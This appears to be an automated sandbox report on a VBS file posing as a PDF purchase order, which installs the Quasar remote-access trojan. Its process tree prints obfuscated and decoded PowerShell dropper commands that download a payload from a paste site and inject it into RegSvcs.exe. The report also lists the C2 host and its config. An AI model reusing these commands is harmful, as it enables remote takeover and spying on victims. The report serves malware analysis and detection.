Overview

overview

10

Static

static

1

PO_978585_...df.vbs

windows7-x64

10

PO_978585_...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-05-2024 17:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PO_978585_Windshield_&_Escape_Slide.pdf.vbs

  • Size

    197KB

  • MD5

    4730787ad81772f8d9b03ae8faf9efc3

  • SHA1

    4d09795bab624a2dbeb62a14870693f8c0dc810c

  • SHA256

    c983314c573fe3408730565056c78968b2fdf9dec5d6f67701bcd62eadc39ea4

  • SHA512

    d7b28b0377fd0ec04d105a6c3ee3ae92ff98d29b3d8aa1d1c677817fad4b9816126eb4e7e23376d60dd1d263dd0e3ad182732b2e2c8ee0cfa54c64440fdaeaec

  • SSDEEP

    384:z1OlYw8nrW9LrBppppppppppppppppppppNGpppppppppppppppppppppppppppf:sfirg/LNA

Score
10/10
quasaraldo_r3gonexecutionspywaretrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pasteio.com/download/xcxWvykfm30a

Extracted

Family

quasar

Version

1.4.1

Botnet

aldo_R3GON

C2

peurnick24.bumbleshrimp.com:7310

Mutex

77413eeb-5d1c-4bf8-986f-3c9d48a16cd6

Attributes
  • encryption_key

    A3226D93494A561FEC5149605B952B09B55012C6

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO_978585_Windshield_&_Escape_Slide.pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒GI▒cwB4▒GU▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Br▒GU▒bgBx▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HU▒c▒Bk▒Gc▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒c▒Bh▒HM▒d▒Bl▒Gk▒bw▒u▒GM▒bwBt▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒C8▒e▒Bj▒Hg▒VwB2▒Hk▒awBm▒G0▒Mw▒w▒GE▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dQBw▒GQ▒Zw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒ag▒1▒DM▒MQ▒4▒Gk▒SwBX▒C8▒dwBh▒HI▒LwBt▒G8▒Yw▒u▒G4▒aQBi▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒ZQBu▒HE▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bi▒HM▒e▒Bl▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\PO_978585_Windshield_&_Escape_Slide.pdf.vbs');powershell -command $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$pbsxe = '034';$kenqx = 'C:\Users\Admin\AppData\Local\Temp\PO_978585_Windshield_&_Escape_Slide.pdf.vbs';[Byte[]] $nupdg = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xcxWvykfm30a'));[system.AppDomain]::CurrentDomain.Load($nupdg).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('j5318iKW/war/moc.nibetsap//:sptth' , $kenqx , '_______________________-------------', $pbsxe, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious use of SetThreadContext
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4144
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\PO_978585_Windshield_&_Escape_Slide.pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:60
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
            PID:880
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            PID:4040

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      fa6b57da4ef6a96e5df9afcbd452e5e0

      SHA1

      d56d203c5847fa787c39e020de72817347d40915

      SHA256

      46b4e20eaac9c9fedc60af05db073b8d0903fc03d5438ad82aa1d521dcdbea59

      SHA512

      c3fb237e362fc26a7f38e99cce04095e0bcbc8e088a411b93f9fe5b7ec52133355177dbf9179c4e01e66a5addf8c2b07956079e2f83d9d486bd745a97175c386

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      6fe7f2ff9f024b0658a4113e39b826fc

      SHA1

      07a0d4ec3b19b62fd409ddb60e843021ac40f1f3

      SHA256

      e8f1c76e1435d42070f4d6c600c2301710b291674c00ef9c069508f0fea69cf1

      SHA512

      64448c79c9070cbc179df72420c1d86d10ea2ff8ae0d9c3fed5676851cb45a64e65a9d637a1f8f41ecf4dc51c3d5ff8a689519d9ea13d9837b3f9cfaddd13979

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      5caad758326454b5788ec35315c4c304

      SHA1

      3aef8dba8042662a7fcf97e51047dc636b4d4724

      SHA256

      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

      SHA512

      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sxpuzaw5.u0n.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/3240-1-0x000002885B870000-0x000002885B892000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3240-11-0x00007FF96DF70000-0x00007FF96EA31000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3240-12-0x00007FF96DF70000-0x00007FF96EA31000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3240-0-0x00007FF96DF73000-0x00007FF96DF75000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3240-42-0x00007FF96DF70000-0x00007FF96EA31000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4040-46-0x0000000006BB0000-0x00000000071C8000-memory.dmp

      Filesize

      6.1MB

      Download

    • memory/4040-36-0x0000000000400000-0x0000000000724000-memory.dmp

      Filesize

      3.1MB

      Download

    • memory/4040-43-0x00000000059A0000-0x0000000005F44000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/4040-44-0x0000000005530000-0x00000000055C2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/4040-45-0x0000000005600000-0x000000000560A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4040-47-0x0000000006740000-0x0000000006790000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4040-48-0x00000000069A0000-0x0000000006A52000-memory.dmp

      Filesize

      712KB

      Download

    • memory/4040-51-0x0000000007CF0000-0x0000000007D02000-memory.dmp

      Filesize

      72KB

      Download

    • memory/4040-52-0x0000000007D50000-0x0000000007D8C000-memory.dmp

      Filesize

      240KB

      Download

    • memory/4040-53-0x0000000007E00000-0x0000000007E66000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4144-35-0x000001DE5CEC0000-0x000001DE5CECA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4144-22-0x000001DE44D70000-0x000001DE44D7A000-memory.dmp

      Filesize

      40KB

      Download